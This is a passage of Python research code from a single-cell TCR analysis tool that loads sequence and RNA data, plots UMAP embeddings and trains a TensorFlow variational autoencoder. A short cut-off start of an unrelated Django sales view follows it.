X_Seq_alpha = np.expand_dims(sequences_num, 1)\n\n if aa_column_beta is not None:\n args = list(zip(beta_sequences, [self.aa_idx] * len(beta_sequences), [self.max_length] * len(beta_sequences)))\n result = p_.starmap(Embed_Seq_Num, args)\n sequences_num = np.vstack(result)\n X_Seq_beta = np.expand_dims(sequences_num, 1)\n\n if self.use_alpha is False:\n X_Seq_alpha = np.zeros(shape=[len(label_id)])\n alpha_sequences = np.asarray([None]*len(label_id))\n\n if self.use_beta is False:\n X_Seq_beta = np.zeros(shape=[len(label_id)])\n beta_sequences = np.asarray([None]*len(label_id))\n\n if p is None:\n p_.close()\n p_.join()\n\n #transform v/d/j genes into categorical space\n num_seq = X_Seq_alpha.shape[0]\n if self.use_v_beta is True:\n self.lb_v_beta = LabelEncoder()\n self.lb_v_beta.classes_ = np.insert(np.unique(v_beta), 0, self.unknown_str)\n v_beta_num = self.lb_v_beta.transform(v_beta)\n else:\n self.lb_v_beta = LabelEncoder()\n v_beta_num = np.zeros(shape=[num_seq])\n v_beta = np.asarray([None]*len(label_id))\n\n if self.use_d_beta is True:\n self.lb_d_beta = LabelEncoder()\n self.lb_d_beta.classes_ = np.insert(np.unique(d_beta), 0, self.unknown_str)\n d_beta_num = self.lb_d_beta.transform(d_beta)\n else:\n self.lb_d_beta = LabelEncoder()\n d_beta_num = np.zeros(shape=[num_seq])\n d_beta = np.asarray([None]*len(label_id))\n\n if self.use_j_beta is True:\n self.lb_j_beta = LabelEncoder()\n self.lb_j_beta.classes_ = np.insert(np.unique(j_beta), 0, self.unknown_str)\n j_beta_num = self.lb_j_beta.transform(j_beta)\n else:\n self.lb_j_beta = LabelEncoder()\n j_beta_num = np.zeros(shape=[num_seq])\n j_beta = np.asarray([None]*len(label_id))\n\n if self.use_v_alpha is True:\n self.lb_v_alpha = LabelEncoder()\n self.lb_v_alpha.classes_ = np.insert(np.unique(v_alpha), 0, self.unknown_str)\n v_alpha_num = self.lb_v_alpha.transform(v_alpha)\n else:\n self.lb_v_alpha = LabelEncoder()\n v_alpha_num = np.zeros(shape=[num_seq])\n v_alpha = np.asarray([None]*len(label_id))\n\n if self.use_j_alpha is True:\n self.lb_j_alpha = LabelEncoder()\n self.lb_j_alpha.classes_ = np.insert(np.unique(j_alpha), 0, self.unknown_str)\n j_alpha_num = self.lb_j_alpha.transform(j_alpha)\n else:\n self.lb_j_alpha = LabelEncoder()\n j_alpha_num = np.zeros(shape=[num_seq])\n j_alpha = np.asarray([None]*len(label_id))\n\n print('Read in scRNA-seq data...')\n sc = pd.read_csv(file_rna, sep=sep, index_col=0)\n # mat = np.expand_dims(np.asarray(sc),1)\n mat = np.asarray(sc)\n barcode = np.asarray(sc.index)\n gene = np.asarray(sc.columns)\n\n# with open(os.path.join(self.Name,'Data.pkl'), 'wb') as f:\n# pickle.dump([X_Seq_alpha,X_Seq_beta,Y, alpha_sequences,beta_sequences, label_id, file_id, freq,counts,seq_index,\n# self.lb,file_list,self.use_alpha,self.use_beta,\n# self.lb_v_beta, self.lb_d_beta, self.lb_j_beta,self.lb_v_alpha,self.lb_j_alpha,\n# v_beta, d_beta,j_beta,v_alpha,j_alpha,\n# v_beta_num, d_beta_num, j_beta_num,v_alpha_num,j_alpha_num, mat, barcode, gene,\n# self.use_v_beta,self.use_d_beta,self.use_j_beta,self.use_v_alpha,self.use_j_alpha],f,protocol=4)\n\n\n self.X_Seq_alpha = X_Seq_alpha\n self.X_Seq_beta = X_Seq_beta\n self.Y = Y\n self.alpha_sequences = alpha_sequences\n self.beta_sequences = beta_sequences\n self.class_id = label_id\n self.sample_id = file_id\n self.freq = freq\n self.counts = counts\n self.sample_list = file_list\n self.v_beta = v_beta\n self.v_beta_num = v_beta_num\n self.d_beta = d_beta\n self.d_beta_num = d_beta_num\n self.j_beta = j_beta\n self.j_beta_num = j_beta_num\n self.v_alpha = v_alpha\n self.v_alpha_num = v_alpha_num\n self.j_alpha = j_alpha\n self.j_alpha_num = j_alpha_num\n self.mat = mat\n self.barcode = barcode\n self.gene = gene\n self.seq_index = np.asarray(list(range(len(self.Y))))\n self.predicted = np.zeros((len(self.Y),len(self.lb.classes_)))\n print('Data Loaded')\n\nclass vis_class(object):\n\n def UMAP_Plot(self, set='all', class_id=None, by_class=False, by_cluster=False,\n by_sample=False, freq_weight=False, show_legend=True,\n scale=100,alpha=1.0,sample=None,sample_per_class=None,filename=None,\n prob_plot=None,plot_by_class=False):\n\n \"\"\"\n # UMAP visualization of TCR Sequences\n This method displays the sequences in a 2-dimensional UMAP where the user can color code points by class label, sample label, or prior computing clustering solution. Size of points can also be made to be proportional to frequency of sequence within sample.\n Args:\n set (str): To choose which set of sequences to analye, enter either 'all','train', 'valid',or 'test'. Since the sequences in the train set may be overfit, it preferable to generally examine the test set on its own.\n by_class (bool): To color the points by their class label, set to True.\n by_sample (bool): To color the points by their sample lebel, set to True.\n by_cluster (bool): To color the points by the prior computed clustering solution, set to True.\n freq_weight (bool): To scale size of points proportionally to their frequency, set to True.\n show_legend (bool): To display legend, set to True.\n scale (float): To change size of points, change scale parameter. Is particularly useful when finding good display size when points are scaled by frequency.\n alpha (float): Value between 0-1 that controls transparency of points.\n sample (int): Number of events to sub-sample for visualization.\n sample_per_class (int): Number of events to randomly sample per class for UMAP.\n filename (str): To save umap plot to results folder, enter a name for the file and the umap will be saved to the results directory. i.e. umap.png\n prob_plot (str): To plot the predicted probabilities for the sequences as an additional heatmap, specify the class probability one wants to visualize (i.e. if the class of interest is class A, input 'A' as a string). Of note, only probabilities determined from the sequences in the test set are displayed as a means of not showing over-fit probabilities. Therefore, it is best to use this parameter when the set parameter is turned to 'test'.\n \"\"\"\n idx = None\n features = self.features\n class_id = self.class_id\n sample_id = self.sample_id\n freq = self.freq\n predicted = self.predicted\n if hasattr(self, 'Cluster_Assignments'):\n IDX = self.Cluster_Assignments\n else:\n IDX = None\n\n if sample_per_class is not None and sample is not None:\n print(\"sample_per_class and sample cannot be assigned simultaneously\")\n return\n\n if sample is not None:\n idx = np.random.choice(range(len(features)), sample, replace=False)\n features = features[idx]\n class_id = class_id[idx]\n sample_id = sample_id[idx]\n freq = freq[idx]\n predicted = predicted[idx]\n if hasattr(self, 'Cluster_Assignments'):\n IDX = IDX[idx]\n else:\n IDX = None\n\n if sample_per_class is not None:\n features_temp = []\n class_temp = []\n sample_temp = []\n freq_temp = []\n predicted_temp = []\n cluster_temp = []\n\n for i in self.lb.classes_:\n sel = np.where(class_id == i)[0]\n sel = np.random.choice(sel, sample_per_class, replace=False)\n features_temp.append(features[sel])\n class_temp.append(class_id[sel])\n sample_temp.append(sample_id[sel])\n freq_temp.append(freq[sel])\n predicted_temp.append(predicted[sel])\n if hasattr(self, 'Cluster_Assignments'):\n cluster_temp.append(IDX[sel])\n\n features = np.vstack(features_temp)\n class_id = np.hstack(class_temp)\n sample_id = np.hstack(sample_temp)\n freq = np.hstack(freq_temp)\n predicted = np.hstack(predicted_temp)\n if hasattr(self, 'Cluster_Assignments'):\n IDX = np.hstack(cluster_temp)\n\n pca = PCA(n_components=20)\n umap_obj = umap.UMAP()\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n X_2 = umap_obj.fit_transform(pca.fit_transform(features))\n with open(os.path.join(self.Name, 'umap.pkl'), 'wb') as f:\n pickle.dump([X_2,features,class_id,sample_id,freq,IDX,idx], f, protocol=4)\n\n df_plot = pd.DataFrame()\n df_plot['x'] = X_2[:, 0]\n df_plot['y'] = X_2[:, 1]\n df_plot['Class'] = class_id\n df_plot['Sample'] = sample_id\n\n if prob_plot is not None:\n df_plot['Predicted'] = predicted[:,self.lb.transform([prob_plot])[0]]\n\n if set != 'all':\n df_plot['Set'] = None\n with pd.option_context('mode.chained_assignment',None):\n df_plot['Set'].iloc[np.where(self.train_idx)[0]] = 'train'\n df_plot['Set'].iloc[np.where(self.valid_idx)[0]] = 'valid'\n df_plot['Set'].iloc[np.where(self.test_idx)[0]] = 'test'\n\n if IDX is not None:\n IDX[IDX == -1] = np.max(IDX) + 1\n IDX = ['Cluster_' + str(I) for I in IDX]\n df_plot['Cluster'] = IDX\n\n if freq_weight is True:\n s = freq * scale\n else:\n s = scale\n\n df_plot['s']=s\n\n if show_legend is True:\n legend = 'full'\n else:\n legend = False\n\n if by_class is True:\n hue = 'Class'\n elif by_cluster is True:\n hue = 'Cluster'\n elif by_sample is True:\n hue = 'Sample'\n else:\n hue = None\n\n if set == 'all':\n df_plot_sel = df_plot\n elif set == 'train':\n df_plot_sel = df_plot[df_plot['Set']=='train']\n elif set == 'valid':\n df_plot_sel = df_plot[df_plot['Set']=='valid']\n elif set == 'test':\n df_plot_sel = df_plot[df_plot['Set']=='test']\n\n df_plot_sel = df_plot_sel.sample(frac=1)\n print(df_plot_sel['Class'])\n plt.figure()\n sns.scatterplot(data=df_plot_sel, x='x', y='y', s=df_plot_sel['s'], hue=hue, legend=legend, alpha=alpha, linewidth=0.0)\n plt.xticks([])\n plt.yticks([])\n plt.xlabel('')\n plt.ylabel('')\n\n if filename is not None:\n plt.savefig(os.path.join(self.directory_results, filename))\n\n if prob_plot is not None:\n plt.figure()\n plt.scatter(df_plot_sel['x'],df_plot_sel['y'],c=df_plot_sel['Predicted'],s=df_plot_sel['s'],\n alpha=alpha,cmap='bwr')\n plt.xticks([])\n plt.yticks([])\n plt.xlabel('')\n plt.ylabel('')\n\n if filename is not None:\n plt.savefig(os.path.join(self.directory_results, 'prob_'+filename))\n\n if plot_by_class is True:\n for i in self.lb.classes_:\n sel = df_plot_sel['Class']==i\n plt.figure()\n sns.scatterplot(data=df_plot_sel[sel], x='x', y='y', s=df_plot_sel['s'][sel], hue=hue, legend=legend, alpha=alpha,\n linewidth=0.0)\n plt.xticks([])\n plt.yticks([])\n plt.xlabel('')\n plt.ylabel('')\n \n self.umap = X_2\n\nclass DeepTCR_U(DeepTCR_base,vis_class):\n\n def _reset_models(self):\n self.models_dir = os.path.join(self.Name,'models')\n if os.path.exists(self.models_dir):\n shutil.rmtree(self.models_dir)\n os.makedirs(self.models_dir)\n\n # latent_dim=64\n def Train_VAE(self,latent_dim=256, kernel = 5, trainable_embedding=True, embedding_dim_aa = 64, embedding_dim_genes = 48, embedding_dim_rna = 1024,\n use_only_seq=False,use_only_gene=False,size_of_net='medium',latent_alpha=1e-3,rna_alpha=1, gene_alpha=1, seq_alpha=1, var_explained=None,graph_seed=2022,\n batch_size=64, epochs_min=0,stop_criterion=0.01,stop_criterion_window=30, accuracy_min=None,\n suppress_output = False,learning_rate=0.001,split_seed=2022, include_RNA = True):\n\n \"\"\"\n # Train Variational Autoencoder (VAE)\n This method trains the network and saves features values for sequences for a variety of downstream analyses that can either be done within the DeepTCR framework or by the user by simplying extracting out the learned representations.\n Args:\n latent_dim (int): Number of latent dimensions for VAE.\n kernel (int): The motif k-mer of the first convolutional layer of the graph.\n trainable_embedding (bool): Toggle to control whether a trainable embedding layer is used or native one-hot representation for convolutional layers.\n embedding_dim_aa (int): Learned latent dimensionality of amino-acids.\n embedding_dim_genes (int): Learned latent dimensionality of VDJ genes\n embedding_dim_rna (int): Learned latent dimensionality of RNA\n use_only_seq (bool): To only use sequence feaures, set to True.\n use_only_gene (bool): To only use gene-usage features, set to True.\n size_of_net (list or str): The convolutional layers of this network have 3 layers for which the use can modify the number of neurons per layer. The user can either specify the size of the network with the following options:\n - small == [12,32,64] neurons for the 3 respective layers\n - medium == [32,64,128] neurons for the 3 respective layers\n - large == [64,128,256] neurons for the 3 respective layers\n - custom, where the user supplies a list with the number of nuerons for the respective layers\n i.e. [3,3,3] would have 3 neurons for all 3 layers.\n One can also adjust the number of layers for the convolutional stack by changing the length of\n this list. [3,3,3] = 3 layers, [3,3,3,3] = 4 layers.\n latent_alpha (float): Penalty coefficient for latent loss. This value changes the degree of latent regularization on the VAE.\n var_explained (float (0-1.0)): Following training, one can select the number of latent features that explain N% of the variance in the data. The output of the method will be the features in order of the explained variance.\n graph_seed (int): For deterministic initialization of weights of the graph, set this to value of choice.\n batch_size (int): Size of batch to be used for each training iteration of the net.\n epochs_min (int): The minimum number of epochs to train the autoencoder.\n stop_criterion (float): Minimum percent decrease in determined interval (below) to continue training. Used as early stopping criterion.\n stop_criterion_window (int): The window of data to apply the stopping criterion.\n accuracy_min (float): Minimum reconstruction accuracy before terminating training.\n suppress_output (bool): To suppress command line output with training statisitcs, set to True.\n split_seed (int): For deterministic batching of data during training, one can set this parameter to value of choice.\n Returns:\n VAE Features\n - self.features (array):\n An array that contains n x latent_dim containing features for all sequences\n - self.explained_variance_ (array):\n The explained variance for the N number of latent features in order of descending value.\n - self.explained_variance_ratio_ (array):\n The explained variance ratio for the N number of latent features in order of descending value.\n ---------------------------------------\n \"\"\"\n\n GO = graph_object()\n GO.size_of_net = size_of_net\n GO.embedding_dim_genes = embedding_dim_genes\n GO.embedding_dim_aa = embedding_dim_aa\n GO.embedding_dim_rna = embedding_dim_rna\n GO.l2_reg = 0.0\n\n graph_model_AE = tf.Graph()\n with graph_model_AE.device(self.device):\n with graph_model_AE.as_default():\n if graph_seed is not None:\n tf.compat.v1.set_random_seed(graph_seed)\n\n GO.net = 'ae'\n GO.Features = Conv_Model(GO, self, trainable_embedding, kernel, use_only_seq, use_only_gene, include_RNA)\n # fc = tf.compat.v1.layers.dense(GO.Features, 256)\n fc = tf.compat.v1.layers.dense(GO.Features, 512, tf.nn.relu)\n fc = tf.compat.v1.layers.dense(fc, latent_dim, tf.nn.relu)\n # z_mean = tf.compat.v1.layers.dense(GO.Features, latent_dim, tf.nn.relu)\n # z_log_var = tf.compat.v1.layers.dense(GO.Features, latent_dim, tf.nn.relu)\n z_w = tf.compat.v1.get_variable(name='z_w',shape=[latent_dim,latent_dim])\n z_mean = tf.matmul(fc,z_w)\n z_log_var = tf.compat.v1.layers.dense(fc, latent_dim, activation=tf.nn.softplus, name='z_log_var')\n latent_cost = Latent_Loss(z_log_var,z_mean,alpha=latent_alpha)\n\n z = z_mean + tf.exp(z_log_var / 2) * tf.random.normal(tf.shape(input=z_mean), 0.0, 1.0, dtype=tf.float32)\n z = tf.identity(z, name='z')\n\n # fc_up = tf.compat.v1.layers.dense(z, 128)\n # fc_up = tf.compat.v1.layers.denGet_RNA_Lossse(fc_up, 256)\n fc_up = tf.compat.v1.layers.dense(z, 512, tf.nn.relu)\n # fc_up = tf.compat.v1.layers.dense(z, embedding_dim_rna, tf.nn.relu)\n fc_up_flat = fc_up\n # fc_up = tf.reshape(fc_up, shape=[-1, 1, 4, 64])\n fc_up = tf.reshape(fc_up, shape=[-1, 1, 4, 128])\n # fc_up = tf.reshape(fc_up, shape=[-1, 1, 4, 100])\n\n ## RNA\n rna_loss = [Get_RNA_Loss(fc_up_flat, GO.embedding_dim_rna, GO.mat, alpha=rna_alpha)]\n\n ## CDR3\n seq_losses = []\n seq_accuracies = []\n if size_of_net == 'small':\n units = [12, 32, 64]\n elif size_of_net == 'medium':\n units = [32, 64, 128]\n elif size_of_net == 'large':\n units = [64, 128, 256]\n else:\n units = size_of_net\n\n if self.use_beta:\n upsample_beta = fc_up\n for _ in range(len(units)-1):\n upsample_beta = tf.compat.v1.layers.conv2d_transpose(upsample_beta, units[-1-_], (1, 3), (1, 2),activation=tf.nn.relu)\n\n kr, str = determine_kr_str(upsample_beta, GO, self)\n\n if trainable_embedding is True:\n upsample3_beta = tf.compat.v1.layers.conv2d_transpose(upsample_beta, GO.embedding_dim_aa, (1, kr),(1, str), activation=tf.nn.relu)\n upsample3_beta = upsample3_beta[:,:,0:self.max_length,:]\n\n embedding_layer_seq_back = tf.transpose(a=GO.embedding_layer_seq, perm=(0, 1, 3, 2))\n logits_AE_beta = tf.squeeze(tf.tensordot(upsample3_beta, embedding_layer_seq_back, axes=(3, 2)),axis=(3, 4), name='logits')\n else:\n logits_AE_beta = tf.compat.v1.layers.conv2d_transpose(upsample_beta, 23, (1, kr),(1, str), activation=tf.nn.relu)\n logits_AE_beta = logits_AE_beta[:,:,0:self.max_length,:]\n\n recon_cost_beta = Recon_Loss(GO.X_Seq_beta, logits_AE_beta,alpha=seq_alpha)\n seq_losses.append(recon_cost_beta)\n\n predicted_beta = tf.squeeze(tf.argmax(input=logits_AE_beta, axis=3), axis=1)\n actual_ae_beta = tf.squeeze(GO.X_Seq_beta, axis=1)\n w = tf.cast(tf.squeeze(tf.greater(GO.X_Seq_beta, 0), 1), tf.float32)\n correct_ae_beta = tf.reduce_sum(input_tensor=w * tf.cast(tf.equal(predicted_beta, actual_ae_beta), tf.float32),axis=1) / tf.reduce_sum(input_tensor=w, axis=1)\n\n accuracy_beta = tf.reduce_mean(input_tensor=correct_ae_beta, axis=0)\n seq_accuracies.append(accuracy_beta)\n\n if self.use_alpha:\n upsample_alpha = fc_up\n for _ in range(len(units)-1):\n upsample_alpha = tf.compat.v1.layers.conv2d_transpose(upsample_alpha, units[-1-_], (1, 3), (1, 2),activation=tf.nn.relu)\n\n kr, str = determine_kr_str(upsample_alpha, GO, self)\n\n if trainable_embedding is True:\n upsample3_alpha = tf.compat.v1.layers.conv2d_transpose(upsample_alpha, GO.embedding_dim_aa, (1, kr), (1, str),activation=tf.nn.relu)\n upsample3_alpha = upsample3_alpha[:,:,0:self.max_length,:]\n\n embedding_layer_seq_back = tf.transpose(a=GO.embedding_layer_seq, perm=(0, 1, 3, 2))\n logits_AE_alpha = tf.squeeze(tf.tensordot(upsample3_alpha, embedding_layer_seq_back, axes=(3, 2)),axis=(3, 4), name='logits')\n else:\n logits_AE_alpha = tf.compat.v1.layers.conv2d_transpose(upsample_alpha, 23, (1, kr), (1, str),activation=tf.nn.relu)\n logits_AE_alpha = logits_AE_alpha[:,:,0:self.max_length,:]\n\n recon_cost_alpha = Recon_Loss(GO.X_Seq_alpha, logits_AE_alpha,alpha=seq_alpha)\n seq_losses.append(recon_cost_alpha)\n\n predicted_alpha = tf.squeeze(tf.argmax(input=logits_AE_alpha, axis=3), axis=1)\n actual_ae_alpha = tf.squeeze(GO.X_Seq_alpha, axis=1)\n w = tf.cast(tf.squeeze(tf.greater(GO.X_Seq_alpha, 0), 1), tf.float32)\n correct_ae_alpha = tf.reduce_sum(input_tensor=w * tf.cast(tf.equal(predicted_alpha, actual_ae_alpha), tf.float32), axis=1) / tf.reduce_sum(input_tensor=w, axis=1)\n accuracy_alpha = tf.reduce_mean(input_tensor=correct_ae_alpha, axis=0)\n seq_accuracies.append(accuracy_alpha)\n \n ## Gene\n gene_loss = []\n gene_accuracies = []\n if self.use_v_beta is True:\n v_beta_loss,v_beta_acc = Get_Gene_Loss(fc_up_flat,GO.embedding_layer_v_beta,GO.X_v_beta_OH,alpha=gene_alpha)\n gene_loss.append(v_beta_loss)\n gene_accuracies.append(v_beta_acc)\n\n if self.use_d_beta is True:\n d_beta_loss, d_beta_acc = Get_Gene_Loss(fc_up_flat,GO.embedding_layer_d_beta,GO.X_d_beta_OH,alpha=gene_alpha)\n gene_loss.append(d_beta_loss)\n gene_accuracies.append(d_beta_acc)\n\n if self.use_j_beta is True:\n j_beta_loss,j_beta_acc = Get_Gene_Loss(fc_up_flat,GO.embedding_layer_j_beta,GO.X_j_beta_OH,alpha=gene_alpha)\n gene_loss.append(j_beta_loss)\n gene_accuracies.append(j_beta_acc)\n\n if self.use_v_alpha is True:\n v_alpha_loss,v_alpha_acc = Get_Gene_Loss(fc_up_flat,GO.embedding_layer_v_alpha,GO.X_v_alpha_OH,alpha=gene_alpha)\n gene_loss.append(v_alpha_loss)\n gene_accuracies.append(v_alpha_acc)\n\n if self.use_j_alpha is True:\n j_alpha_loss,j_alpha_acc = Get_Gene_Loss(fc_up_flat,GO.embedding_layer_j_alpha,GO.X_j_alpha_OH,alpha=gene_alpha)\n gene_loss.append(j_alpha_loss)\n gene_accuracies.append(j_alpha_acc)\n\n recon_losses = seq_losses + gene_loss + rna_loss\n\n accuracies = seq_accuracies + gene_accuracies\n\n if use_only_gene:\n recon_losses = gene_loss\n accuracies = gene_accuracies\n if use_only_seq:\n recon_losses = seq_losses\n accuracies = seq_accuracies\n\n temp = []\n temp_seq = []\n temp_gene = []\n temp_rna = []\n\n for l in recon_losses:\n l = l[:,tf.newaxis]\n temp.append(l)\n for l_seq in seq_losses:\n l_seq = l_seq[:,tf.newaxis]\n temp_seq.append(l_seq)\n for l_gene in gene_loss:\n l_gene = l_gene[:,tf.newaxis]\n temp_gene.append(l_gene)\n for l_rna in rna_loss:\n l_rna = l_rna[:,tf.newaxis]\n temp_rna.append(l_rna)\n \n recon_losses = temp\n recon_losses = tf.concat(recon_losses,1)\n recon_cost = tf.reduce_sum(input_tensor=recon_losses, axis=1)\n recon_cost = tf.reduce_mean(input_tensor=recon_cost)\n\n temp_seq = tf.concat(temp_seq,1)\n seq_cost = tf.reduce_sum(input_tensor=temp_seq,axis=1)\n seq_cost = tf.reduce_mean(input_tensor=seq_cost)\n temp_gene = tf.concat(temp_gene,1)\n gene_cost = tf.reduce_sum(input_tensor=temp_gene,axis=1)\n gene_cost = tf.reduce_mean(input_tensor=gene_cost)\n temp_rna = tf.concat(temp_rna,1)\n rna_cost = tf.reduce_sum(input_tensor=temp_rna,axis=1)\n rna_cost = tf.reduce_mean(input_tensor=rna_cost)\n\n total_cost = [recon_losses,latent_cost[:,tf.newaxis]]\n total_cost = tf.concat(total_cost,1)\n total_cost = tf.reduce_sum(input_tensor=total_cost,axis=1)\n total_cost = tf.reduce_mean(input_tensor=total_cost)\n\n num_acc = len(accuracies)\n accuracy = 0\n for a in accuracies:\n accuracy += a\n accuracy = accuracy/num_acc\n latent_cost = tf.reduce_mean(input_tensor=latent_cost)\n\n opt_ae = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate).minimize(total_cost)\n\n GO.saver = tf.compat.v1.train.Saver(max_to_keep=None)\n\n self._reset_models()\n tf.compat.v1.reset_default_graph()\n config = tf.compat.v1.ConfigProto(allow_soft_placement=True)\n config.gpu_options.allow_growth = True\n\n with tf.compat.v1.Session(graph=graph_model_AE,config=config) as sess:\n sess.run(tf.compat.v1.global_variables_initializer())\n stop_check_list = []\n accuracy_list = []\n recon_loss = []\n train_loss = []\n latent_loss = []\n seq_loss_lst = []\n gene_loss_lst = []\n rna_loss_lst = []\n training = True\n e = 0\n while training:\n iteration = 0\n Vars = [self.X_Seq_alpha,self.X_Seq_beta,self.v_beta_num,self.d_beta_num,self.j_beta_num,\n self.v_alpha_num,self.j_alpha_num, self.mat]\n\n if split_seed is not None:\n np.random.seed(split_seed)\n\n for vars in get_batches(Vars, batch_size=batch_size,random=True):\n feed_dict = {}\n if self.use_alpha is True:\n feed_dict[GO.X_Seq_alpha] = vars[0]\n \n if self.use_beta is True:\n feed_dict[GO.X_Seq_beta] = vars[1]\n\n if self.use_v_beta is True:\n feed_dict[GO.X_v_beta] = vars[2]\n\n if self.use_d_beta is True:\n feed_dict[GO.X_d_beta] = vars[3]\n\n if self.use_j_beta is True:\n feed_dict[GO.X_j_beta] = vars[4]\n\n if self.use_v_alpha is True:\n feed_dict[GO.X_v_alpha] = vars[5]\n\n if self.use_j_alpha is True:\n feed_dict[GO.X_j_alpha] = vars[6]\n \n feed_dict[GO.mat] = vars[7]\n \n train_loss_i, recon_loss_i, seq_losses_i, gene_loss_i, rna_loss_i, latent_loss_i, accuracy_i, _ = sess.run([total_cost, recon_cost, seq_cost, gene_cost, rna_cost, latent_cost, accuracy, opt_ae], feed_dict=feed_dict)\n accuracy_list.append(accuracy_i)\n recon_loss.append(recon_loss_i)\n latent_loss.append(latent_loss_i)\n train_loss.append(train_loss_i)\n seq_loss_lst.append(seq_losses_i)\n gene_loss_lst.append(gene_loss_i)\n rna_loss_lst.append(rna_loss_i)\n \n if suppress_output is False:\n print(\"Epoch = {}, Iteration = {}\".format(e,iteration),\n \"Total Loss: {:.5f}:\".format(train_loss_i),\n \"Recon Loss: {:.5f}:\".format(recon_loss_i),\n \"CDR3 Loss: {:.5f}:\".format(seq_losses_i),\n \"Gene Loss: {:.5f}:\".format(gene_loss_i),\n \"RNA Loss: {:.5f}:\".format(rna_loss_i),\n \"Latent Loss: {:.5f}:\".format(latent_loss_i),\n \"Recon Accuracy: {:.5f}\".format(accuracy_i))\n\n if e >= epochs_min:\n if accuracy_min is not None:\n if np.mean(accuracy_list[-10:]) > accuracy_min:\n training = False\n break\n else:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n stop_check_list.append(stop_check(train_loss,stop_criterion,stop_criterion_window))\n if np.sum(stop_check_list[-3:]) >= 3:\n training = False\n break\n iteration += 1\n e += 1\n\n features_list = []\n accuracy_list = []\n alpha_features_list = []\n alpha_indices_list = []\n beta_features_list = []\n beta_indices_list = []\n RNA_list = []\n Vars = [self.X_Seq_alpha, self.X_Seq_beta, self.v_beta_num, self.d_beta_num, self.j_beta_num,\n self.v_alpha_num, self.j_alpha_num, self.mat]\n\n for vars in get_batches(Vars, batch_size=batch_size, random=False):\n feed_dict = {}\n if self.use_alpha is True:\n feed_dict[GO.X_Seq_alpha] = vars[0]\n if self.use_beta is True:\n feed_dict[GO.X_Seq_beta] = vars[1]\n\n if self.use_v_beta is True:\n feed_dict[GO.X_v_beta] = vars[2]\n\n if self.use_d_beta is True:\n feed_dict[GO.X_d_beta] = vars[3]\n\n if self.use_j_beta is True:\n feed_dict[GO.X_j_beta] = vars[4]\n\n if self.use_v_alpha is True:\n feed_dict[GO.X_v_alpha] = vars[5]\n\n if self.use_j_alpha is True:\n feed_dict[GO.X_j_alpha] = vars[6]\n\n feed_dict[GO.mat] = vars[7]\n\n get = z_mean\n features_ind, accuracy_check = sess.run([get, accuracy], feed_dict=feed_dict)\n features_list.append(features_ind)\n accuracy_list.append(accuracy_check)\n\n if self.use_alpha is True:\n alpha_ft, alpha_i = sess.run([GO.alpha_out,GO.indices_alpha],feed_dict=feed_dict)\n alpha_features_list.append(alpha_ft)\n alpha_indices_list.append(alpha_i)\n\n if self.use_beta is True:\n beta_ft, beta_i = sess.run([GO.beta_out,GO.indices_beta],feed_dict=feed_dict)\n beta_features_list.append(beta_ft)\n beta_indices_list.append(beta_i)\n\n rna_lowdim = sess.run([GO.rna_features],feed_dict=feed_dict)\n RNA_list.append(rna_lowdim)\n\n features = np.vstack(features_list)\n accuracy_list = np.hstack(accuracy_list)\n if self.use_alpha is True:\n self.alpha_features = np.vstack(alpha_features_list)\n self.alpha_indices = np.vstack(alpha_indices_list)\n\n if self.use_beta is True:\n self.beta_features = np.vstack(beta_features_list)\n self.beta_indices = np.vstack(beta_indices_list)\n\n self.rna_lowdim = np.vstack(RNA_list[0]) \n\n self.kernel = kernel\n #\n# if self.use_alpha is True:\n# var_save = [self.alpha_features, self.alpha_indices, self.alpha_sequences]\n# with open(os.path.join(self.Name, 'alpha_features.pkl'), 'wb') as f:\n# pickle.dump(var_save, f)\n\n# if self.use_beta is True:\n# var_save = [self.beta_features, self.beta_indices, self.beta_sequences]\n# with open(os.path.join(self.Name, 'beta_features.pkl'), 'wb') as f:\n# pickle.dump(var_save, f)\n \n# with open(os.path.join(self.Name, 'rna_features.pkl'), 'wb') as f:\n# pickle.dump(self.rna_lowdim, f)\n\n# with open(os.path.join(self.Name, 'kernel.pkl'), 'wb') as f:\n# pickle.dump(self.kernel, f)\n\n\n print('Reconstruction Accuracy: {:.5f}'.format(np.nanmean(accuracy_list)))\n\n embedding_layers = [GO.embedding_layer_v_alpha,GO.embedding_layer_j_alpha,\n GO.embedding_layer_v_beta,GO.embedding_layer_d_beta,\n GO.embedding_layer_j_beta]\n embedding_names = ['v_alpha','j_alpha','v_beta','d_beta','j_beta']\n name_keep = []\n embedding_keep = []\n for n,layer in zip(embedding_names,embedding_layers):\n if layer is not None:\n embedding_keep.append(layer.eval())\n name_keep.append(n)\n\n embed_dict = dict(zip(name_keep,embedding_keep))\n\n # sort features by variance explained\n cov = np.cov(features.T)\n explained_variance = np.diag(cov)\n ind = np.flip(np.argsort(explained_variance))\n explained_variance = explained_variance[ind]\n explained_variance_ratio = explained_variance / np.sum(explained_variance)\n features = features[:, ind]\n\n if var_explained is not None:\n features = features[:, 0:np.where(np.cumsum(explained_variance_ratio) > var_explained)[0][0] + 1]\n\n self.ind = ind[:features.shape[1]]\n #save model data and information for inference engine\n# save_model_data(self,GO.saver,sess,name='VAE',get=z_mean)\n\n with open(os.path.join(self.Name,'VAE_features.pkl'), 'wb') as f:\n pickle.dump([features,embed_dict,explained_variance,explained_variance_ratio], f,protocol=4)\n\n self.features = features\n self.embed_dict = embed_dict\n self.explained_variance_ = explained_variance\n self.explained_variance_ratio_ = explained_variance_ratio\n self.loss = train_loss\n self.latent_loss = latent_loss\n self.recon_loss = recon_loss\n \n with open(os.path.join(self.Name,'loss_accuracy.pkl'), 'wb') as f:\n pickle.dump([train_loss,latent_loss,recon_loss, accuracy_list], f,protocol=4)\n \n print('Training Done')\n ","repo_name":"biqing-zhu/scNAT","sub_path":"scNAT/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":49428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9850399408","text":"from django.shortcuts import render, HttpResponseRedirect\nfrom django.views.generic import ListView, CreateView\nfrom .models import Sale\nfrom .forms import create_form\nfrom django.urls import reverse\nfrom django.db.models import Sum\nfrom django.contrib import messages\nfrom django.db.models import F\nfrom django.db.models import Sum, F\nfrom account.decorators import allowed_users\n# Create your views here.\n\n\n# sales\n@allowed_users(allowed_roles=['Administrator', 'employee'])\ndef Home(request):\n # total_sales = Sale.objects.all().aggregate(Sum('amount'))\n # total_sales = Sale.objects.extra(select={'total': \"quantity * selling_price \"}).aggregate(Sum('total'))\n # total_sales = 